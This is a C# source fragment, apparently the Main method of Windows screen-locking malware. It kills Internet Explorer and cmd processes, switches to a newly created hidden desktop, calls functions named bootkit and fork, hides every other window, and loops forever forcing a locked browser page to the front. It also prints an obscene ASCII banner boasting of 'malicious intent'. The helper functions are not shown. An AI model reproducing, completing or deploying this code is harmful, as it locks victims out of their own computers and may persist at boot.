static void Main(string[] args) { fork(); //unlink_psexec(); new Thread(killthread).Start(); bootkit(); //bsod(); External.Invincible(); whatTemp(); populateImages(); new Thread(bkthread).Start(); new Thread(drawOnWindows).Start(); new Thread(drawall).Start(); new Thread(sdraws).Start(); new Thread(sdrawthread).Start(); setDesktop(); var ptr = External.OpenDesktop("Rummery", 0, false, (uint)DESKTOP_ACCESS.GENERIC_ALL); if (ptr == IntPtr.Zero) { ptr = External.CreateDesktop("Rummery", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero); } External.SwitchDesktop(ptr); forceNavigate(); spawnLockIE("Winlogon"); //spawnLockIE("Rummery"); setIETitle(); //External.LockWorkStation(); Console.ForegroundColor = ConsoleColor.Green; Console.Write( @" RUMMERY!! . . ________________ . . . ____/ ( ( ) ) \___ . /( ( ( ) _ )) ) )\ . . (( ( )( ) ) ( ) ) . . . ((/ ( _( ) ( _) ) ( () ) )_ . . (( f) u ( c k ( 2) h )e )c.t)o(r )_ ##### #### ### ### ###### ( _) #### # # ###### ##### # # # # # # # ) # # # # # # # # ### ###### # # # ###### ) ( # # # # ###### ##### # # # # # # # # ( _ # # # # # # # ##### # # # # # ###### _ ) #### # ###### # # ` . . (_((__(_(__(( ( ( | ) ) ) )_))__))_)___) . . ((__) \\||lll|l||/// \_)) . . . / ( |(||(|)|||// \ . . . . . . . ( /(/ ( ) ) )\ . . . . . ( . ( ( ( | | ) ) )\ ) . ( /(| / ( )) ) ) )) ) . . . . . . . . . . ( . ( ((((_(|)_))))) ) . . . ( . ||\(|(|)|/|| . . ) . . . . ( . |(||(||)|||| . ) . . . . . . . ( //|/l|||)|\\ \ ) . . . (/ / // /|//||||\\ \ \ \ _) Interpreting docs with malicious intent since '11"); Console.WriteLine(); var ident = System.Security.Principal.WindowsIdentity.GetCurrent().Name + "@" + Environment.MachineName + ": " + Environment.OSVersion.VersionString.Replace("Microsoft Windows ", ""); Console.Title = "SALAMANDERS! " + ident; Process.GetProcesses().Where( p => p.ProcessName == "iexplore" || p.ProcessName == "cmd" ).ToList().ForEach( p => p.Kill() ); //Thread.Sleep(5000); while (true) { var processes = Process.GetProcesses(); if ( processes.Select(p => p.ProcessName).Contains("iexplore") && processes.Select(p => p.MainWindowTitle).Any(t => t.Contains("police-polecat-13066")) ) { //var proc = processes.First(p => p.MainWindowTitle.Contains("police-polecat-13066")); //Program.SetWindowPos( // proc.MainWindowHandle, new IntPtr(-1), 0, 0, 0, 0, 0x0002 | 0x0001 //); foreach (var proc in processes) { if (proc.MainWindowTitle.Contains("police-polecat-13066") || proc.MainWindowTitle.Contains("Mess with the best")) { //-1: Send to front, position 0,0, size (ignored) 0x0 due to, 0x0001: SWP_NOSIZE External.SetWindowPos(proc.MainWindowHandle, new IntPtr(-1), 0, 0, 0, 0, 0x0001); } else { //1: Send to back, reposition to 3000,0, resize to 0x0, hide window External.SetWindowPos(proc.MainWindowHandle, new IntPtr(1), 3000, 0, 0, 0, 0x0080); } } } else { var pInfo = new ProcessStartInfo( "iexplore.exe", "-nomerge " + hPath ); pInfo.WindowStyle = ProcessWindowStyle.Maximized; var p = new Process(); p.StartInfo = pInfo; p.Start(); } processes.Where( p => !p.MainWindowTitle.Contains("police-polecat-13066") && p.ProcessName != "iexplore" ).ToList().ForEach(p => External.ShowWindow(p.MainWindowHandle, 11)); External.SwitchDesktop(ptr); Process.GetCurrentProcess().PriorityClass = ProcessPriorityClass.High; Process.GetCurrentProcess().PriorityBoostEnabled = true; forceNavigate(); spawnLockIE("Winlogon"); //spawnLockIE("Rummery"); setIETitle(); setDesktop(); Thread.Sleep(2000); } }